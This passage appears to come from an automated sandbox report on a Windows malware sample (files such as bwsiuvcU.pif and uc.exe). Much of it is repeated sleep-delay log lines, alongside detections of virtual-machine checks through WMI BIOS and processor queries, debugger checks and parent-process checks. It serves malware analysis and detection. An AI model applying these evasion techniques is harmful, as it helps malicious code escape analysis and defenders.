Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -99078s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -98936s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -98822s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -98718s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -98606s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -98484s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -98374s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -98264s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -98156s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -98046s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -97936s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -97797s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -97685s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -97564s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -97424s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -97292s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -97180s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -1200000s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -1199865s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -1199744s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -1199618s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -1199448s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -1199323s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -1199199s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -1199043s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -1198916s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -1198764s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -1198627s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -1198467s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044	Thread sleep time: -1198331s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep count: 32 > 30
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -29514790517935264s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -100000s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 7992	Thread sleep count: 3310 > 30
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -99875s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 7992	Thread sleep count: 6521 > 30
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -99751s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -99609s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -99500s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -99388s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -99265s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -99146s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -99019s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -98890s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -98781s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -98672s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -98562s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -98453s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -98342s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -98218s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -98109s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -97979s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -97859s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -97750s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -97631s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -97515s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -97390s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -97278s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1200000s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1199829s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1199704s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1199590s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1199469s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1199359s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1199250s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1199110s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1199000s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1198888s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1198781s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1198657s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1198532s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1198422s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1198297s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1198185s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1198078s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1197954s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1197836s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1197730s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1197586s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1197471s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1197344s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1197235s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1197094s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1196985s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352	Thread sleep time: -1196875s >= -30000s

Queries disk information (often used to detect virtual machines)

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Users\Public\Libraries\bwsiuvcU.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Users\Public\Libraries\bwsiuvcU.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Last function: Thread delayed
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Last function: Thread delayed
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Last function: Thread delayed
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\uc.exe

Code function: 19_2_029858CC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

19_2_029858CC

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 99872	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 99749	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 99640	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 99530	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 99417	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 99297	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 99181	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 99071	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98959	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98843	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98734	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98624	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98515	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98399	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98296	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98176	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98062	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 97945	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 97825	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 97718	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 97609	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 97499	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 97390	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 97281	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 97169	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 97062	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 96953	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 96843	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 96734	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 96624	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 96515	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1200000	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199809	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199687	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199305	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199172	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197547	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197435	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197328	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197219	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197109	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197000	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1196880	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1196766	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1196652	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1196544	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1196403	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1196229	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1196124	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1196012	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1195854	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1195728	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1195608	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1195470	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1195295	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1195143	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1194979	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1194835	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1194719	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 100000
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 99879
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 99765
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 99655
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 99546
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 99435
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 99325
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 99209
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 99078
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98936
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98822
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98718
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98606
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98484
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98374
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98264
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98156
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98046
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 97936
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 97797
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 97685
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 97564
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 97424
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 97292
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 97180
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1200000
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199865
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199744
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199618
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199448
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199323
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199199
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199043
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198916
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198764
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198627
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198467
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198331
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 100000
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 99875
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 99751
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 99609
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 99500
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 99388
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 99265
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 99146
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 99019
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98890
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98781
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98672
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98562
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98453
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98342
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98218
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 98109
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 97979
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 97859
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 97750
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 97631
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 97515
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 97390
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 97278
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1200000
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199829
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199704
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199590
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199469
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199359
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199250
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199110
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199000
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198888
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198781
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198657
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198532
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198422
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198297
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198185
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1198078
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197954
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197836
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197730
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197586
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197471
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197344
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197235
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197094
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1196985
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1196875

Source: bwsiuvcU.pif, 00000019.00000002.1793876103.0000000029440000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000003.1711636457.000000002944F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
Source: mshta.exe, 00000009.00000002.1863621793.0000019AC1767000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1858256707.0000019AC1766000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1856924692.0000019AC1757000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852117667.0000019AC1757000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1863133474.0000019AC16A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1863133474.0000019AC1716000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2529557915.0000021C3382B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2531528743.0000021C38E58000.00000004.00000020.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1496845420.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1496845420.00000000007AB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000011.00000002.1635136687.0000029E32767000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}n
Source: Ucvuiswb.PIF, 00000018.00000002.1625890136.00000000005FA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllvvX
Source: powershell.exe, 00000011.00000002.1635136687.0000029E3275E000.00000004.00000020.00020000.00000000.sdmp, Ucvuiswb.PIF, 0000001A.00000002.1711968278.00000000005DB000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556758276.00000000411C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: bwsiuvcU.pif, 00000017.00000002.1683295114.0000000041300000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllaa

Source: C:\Users\user\AppData\Roaming\uc.exe	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	API call chain: ExitProcess graph end node

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\Public\Libraries\bwsiuvcU.pif

Code function: 23_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

23_2_0040CE09

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Users\Public\Libraries\bwsiuvcU.pif

23_2_004019F0

Contains functionality to dynamically determine API calls

